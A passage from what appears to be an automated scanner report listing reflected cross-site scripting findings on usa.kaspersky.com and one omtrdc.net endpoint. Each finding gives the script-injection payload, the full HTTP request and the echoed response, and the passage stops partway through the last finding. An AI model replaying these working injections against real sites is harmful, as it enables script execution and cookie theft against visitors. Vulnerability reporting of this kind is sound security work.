Content-Type: text/html; charset=utf-8
Content-Length: 34850
Date: Sun, 17 Apr 2011 13:05:10 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html?487ba"><script>alert(1)</script>aa7cd075570=1" />
...[SNIP]...

4.58. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a7d0"-alert(1)-"126d375c027 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?1a7d0"-alert(1)-"126d375c027=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045514"
Content-Type: text/html; charset=utf-8
Content-Length: 34770
Date: Sun, 17 Apr 2011 13:05:16 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
{ s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html?1a7d0"-alert(1)-"126d375c027=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.59. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5bd2"-alert(1)-"a64730ff9f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/searchb5bd2"-alert(1)-"a64730ff9f0/search.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046599"
Content-Type: text/html; charset=utf-8
Content-Length: 30329
Date: Sun, 17 Apr 2011 13:23:21 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/searchb5bd2"-alert(1)-"a64730ff9f0/search.css?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.60. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b76"><script>alert(1)</script>9e28f61214c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search34b76"><script>alert(1)</script>9e28f61214c/search.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046595"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sun, 17 Apr 2011 13:23:17 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search34b76"><script>alert(1)</script>9e28f61214c/search.css?D" />
...[SNIP]...

4.61. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73b4"><script>alert(1)</script>7c4d80f2788 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.cssf73b4"><script>alert(1)</script>7c4d80f2788?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046604"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sun, 17 Apr 2011 13:23:26 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search/search.cssf73b4"><script>alert(1)</script>7c4d80f2788?D" />
...[SNIP]...

4.62. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d413"-alert(1)-"5ca6375d2ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.css8d413"-alert(1)-"5ca6375d2ca?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046608"
Content-Type: text/html; charset=utf-8
Content-Length: 30329
Date: Sun, 17 Apr 2011 13:23:29 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/search/search.css8d413"-alert(1)-"5ca6375d2ca?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.63. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2010a"><script>alert(1)</script>7da5ccb57fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/2010a"><script>alert(1)</script>7da5ccb57fe HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045225"
Content-Type: text/html; charset=utf-8
Content-Length: 30365
Date: Sun, 17 Apr 2011 13:00:27 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/default/files/2010a"><script>alert(1)</script>7da5ccb57fe" />
...[SNIP]...

4.64. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61fec</script><script>alert(1)</script>a37e498334b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/61fec</script><script>alert(1)</script>a37e498334b HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045242"
Content-Type: text/html; charset=utf-8
Content-Length: 30405
Date: Sun, 17 Apr 2011 13:00:44 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/default/files/61fec</script><script>alert(1)</script>a37e498334b";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.65. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 981ec"-alert(1)-"965c4b42b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/981ec"-alert(1)-"965c4b42b5c/files/css_injector_1.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045228"
Content-Type: text/html; charset=utf-8
Content-Length: 30366
Date: Sun, 17 Apr 2011 13:00:30 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/981ec"-alert(1)-"965c4b42b5c/files/css_injector_1.css?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.66. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ac6"><script>alert(1)</script>480844bb7c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045223"
Content-Type: text/html; charset=utf-8
Content-Length: 30463
Date: Sun, 17 Apr 2011 13:00:25 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D" />
...[SNIP]...

4.67. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9a74"-alert(1)-"ec10ab2148f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_1.csse9a74"-alert(1)-"ec10ab2148f?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045240"
Content-Type: text/html; charset=utf-8
Content-Length: 31837
Date: Sun, 17 Apr 2011 13:00:42 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
me = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.csse9a74"-alert(1)-"ec10ab2148f?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.68. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c50a"><script>alert(1)</script>d5b800973fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_1.css5c50a"><script>alert(1)</script>d5b800973fa?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045235"
Content-Type: text/html; charset=utf-8
Content-Length: 30565
Date: Sun, 17 Apr 2011 13:00:37 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css5c50a"><script>alert(1)</script>d5b800973fa?D" />
...[SNIP]...

4.69. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload a56ed<script>alert(1)</script>7b64c0d8f47 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

